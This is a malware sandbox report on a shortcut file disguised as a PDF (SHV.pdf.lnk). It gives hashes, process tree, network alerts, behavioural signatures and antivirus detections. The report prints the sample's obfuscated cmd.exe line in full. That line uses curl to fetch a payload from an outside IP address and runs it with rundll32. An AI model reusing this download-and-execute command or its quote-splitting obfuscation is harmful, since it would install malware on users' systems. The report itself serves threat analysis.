Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 2, 2023, 8:41 a.m.	Oct. 2, 2023, 8:43 a.m.

Size	2.1KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 6 04:51:36 2021, mtime=Thu Sep 28 04:49:54 2023, atime=Wed Oct 6 04:51:36 2021, length=289792, window=hidenormalshowminimized
MD5	`6474f6c0ce3a9c295c45a612d40d4d7e`
SHA256	`6f0eb0065aaa0e4bfce61ffb6a63e086a78e682db5d3a481542a871cd2d37eaf`
CRC32	`3ED1C618`
ssdeep	`24:8aPEWJCnQcV0RA8Z1leL+/Vk+B7IhYerbi858tdhXJ:8aS6iAleek+B7Ihqt`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "RtCdsuXIZksWC" C:\Users\test22\AppData\Local\Temp\SHV.pdf.lnk
3048
- cmd.exe "C:\Windows\System32\cmd.exe" /c 6jn || EcHO 6jn & PI"n"G 6jn || C"u"r"L" http://"1"55".1"38".1"6"4".1"16"/R"f"Oh"Ptl"/"JaZ" -o C:\Users\test22\AppData\Local\Temp\6jn.log & PI"n"G -n 3 6jn || r"unDL"L"3"2 C:\Users\test22\AppData\Local\Temp\6jn.log scab /k pechene634 & e"X"It 'fSaoOhZkKFXWA
  2200
  - PING.EXE PI"n"G 6jn
    2220
  - curl.exe C"u"r"L" http://"1"55".1"38".1"6"4".1"16"/R"f"Oh"Ptl"/"JaZ" -o C:\Users\test22\AppData\Local\Temp\6jn.log
    2392
  - PING.EXE PI"n"G -n 3 6jn
    1684
  - rundll32.exe r"unDL"L"3"2 C:\Users\test22\AppData\Local\Temp\6jn.log scab /k pechene634
    1628

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
155.138.164.116	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49166 -> 155.138.164.116:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.102:49166 -> 155.138.164.116:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 2, 2023, 8:40 a.m.	buffer: '6jn' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Oct. 2, 2023, 8:40 a.m.	buffer: 6jn console_handle: 0x00000007	1	1
WriteConsoleW Oct. 2, 2023, 8:40 a.m.	buffer: 'e"X"It' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleA Oct. 2, 2023, 8:40 a.m.	buffer: Ping request could not find host 6jn. Please check the name and try again. console_handle: 0x00000007	1	1
WriteConsoleA Oct. 2, 2023, 8:40 a.m.	buffer: Ping request could not find host 6jn. Please check the name and try again. console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 2, 2023, 8:40 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 2, 2023, 8:40 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75d2d08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75d2964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75d14d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75d16f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75d1e825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75d16002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75d15fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75d149e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75d15a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x774a9a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x774c8f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x774c8e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x74e87a25 rundll32+0x135c @ 0x63135c rundll32+0x1901 @ 0x631901 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x75d43ef4 registers.esp: 1898380 registers.edi: 0 registers.eax: 6484576 registers.ebp: 1898408 registers.edx: 1 registers.ebx: 0 registers.esi: 4970536 registers.ecx: 1941190356	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 2, 2023, 8:40 a.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75d2d08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75d2964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75d14d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75d16f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75d1e825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75d16002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75d15fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75d149e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75d15a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x774a9a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x774c8f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x774c8e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x74e87a25
rundll32+0x135c @ 0x63135c
rundll32+0x1901 @ 0x631901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x75d43ef4
registers.esp: 1898380
registers.edi: 0
registers.eax: 6484576
registers.ebp: 1898408
registers.edx: 1
registers.ebx: 0
registers.esi: 4970536
registers.ecx: 1941190356

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://155.138.164.116/RfOhPtl/JaZ

Performs some HTTP requests (1 event)

request

GET http://155.138.164.116/RfOhPtl/JaZ

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 2, 2023, 8:40 a.m.	process_identifier: 1628 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f11000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Oct. 2, 2023, 8:40 a.m.	process_identifier: 1628 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f13000 process_handle: 0xffffffff	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\SHV.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c 6jn || EcHO 6jn & PI"n"G 6jn || C"u"r"L" http://"1"55".1"38".1"6"4".1"16"/R"f"Oh"Ptl"/"JaZ" -o C:\Users\test22\AppData\Local\Temp\6jn.log & PI"n"G -n 3 6jn || r"unDL"L"3"2 C:\Users\test22\AppData\Local\Temp\6jn.log scab /k pechene634 & e"X"It 'fSaoOhZkKFXWA

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

155.138.164.116

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3048 resumed a thread in remote process 2200
NtResumeThread Oct. 2, 2023, 8:40 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 2200	1	0	0

File has been identified by 25 AntiVirus engines on VirusTotal as malicious (25 events)

Arcabit	Trojan.Generic.D424E437
Cyren	LNK/Agent.DL.gen!Eldorado
Symantec	Trojan.Mallnk
ESET-NOD32	LNK/TrojanDownloader.Agent.BPE
TrendMicro-HouseCall	Trojan.LNK.DARKGATE.YXDI4Z
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
BitDefender	Trojan.GenericKD.69526583
MicroWorld-eScan	Trojan.GenericKD.69526583
Emsisoft	Trojan.GenericKD.69526583 (B)
TrendMicro	Trojan.LNK.DARKGATE.YXDI4Z
McAfee-GW-Edition	BehavesLike.Trojan.xx
FireEye	Trojan.GenericKD.69526583
Sophos	Troj/LnkObf-V
SentinelOne	Static AI - Suspicious LNK
Microsoft	Trojan:Win32/IcedIdLNK.PA!MTB
ZoneAlarm	HEUR:Trojan.WinLNK.Agent.gen
GData	Trojan.GenericKD.69526583
Google	Detected
McAfee	LNK/Downloader.cz
MAX	malware (ai score=85)
Zoner	Probably Heur.LNKScript
Ikarus	Trojan-Downloader.LNK.Agent
Fortinet	LNK/Agent.BPE!tr.dldr
AVG	Other:Malware-gen [Trj]

SHV.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All